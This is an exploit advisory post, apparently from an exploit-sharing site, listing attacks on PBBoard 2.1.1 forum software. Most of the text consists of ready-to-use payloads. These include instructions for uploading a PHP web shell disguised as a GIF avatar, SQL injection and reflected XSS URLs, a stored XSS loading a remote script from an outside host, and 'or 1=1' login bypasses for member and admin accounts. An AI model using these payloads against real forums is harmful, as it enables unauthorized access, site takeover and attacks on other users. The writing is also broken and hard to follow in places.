==================================================
PBBoard 2.1.1 Multiple Remote Vulnerabilities
==================================================|=-----------------------------------------------------=||=-------------=[JIKO |No-exploit.Com|]=-----------=||=-----------------------------------------------------=|[~]-----------|00|
NAme:JIKO (JAWAD)
Home:No-exploit.Com
Mail: !x!
[~]-----------|01|-{Script}
name :PBBoard_v2.1.1
link :http://www.pbboard.com/PBBoard_v2.1.1.zip[~]-----------|02|-{3xpl01t}
upload Shell andfile.exe ....etc :(
http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1
select From my Pc
and upload your Shell php with GIF89a; you can see the size of img islong use a programme for inser php code in img
sql & xss
all script is infected :(
inser '(inall% variable in the script
SQl :/index.php?page=forum&show=1&id=2'a
Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
SQl :/index.php?page=profile&show=1&username=jawad'
SQl :/index.php?page=profile&show=1&username=jawad' and id='1
Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>........etc
Xss In Profil
Url :/index.php?page=usercp&control=1&avatar=1&main=1
Select img From Url
http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
Login :(
User : real name of admin or member you want | jawad' or '1=1--
Pass : jiko
for admin panel
Url:/admin.php
User : jawad' or '1=1--
Pass : jiko
:((..Etc exploit
[~]-----------|03|-{Greetz}
All my friends
|No-Exploit.com Members
-------------------------------------
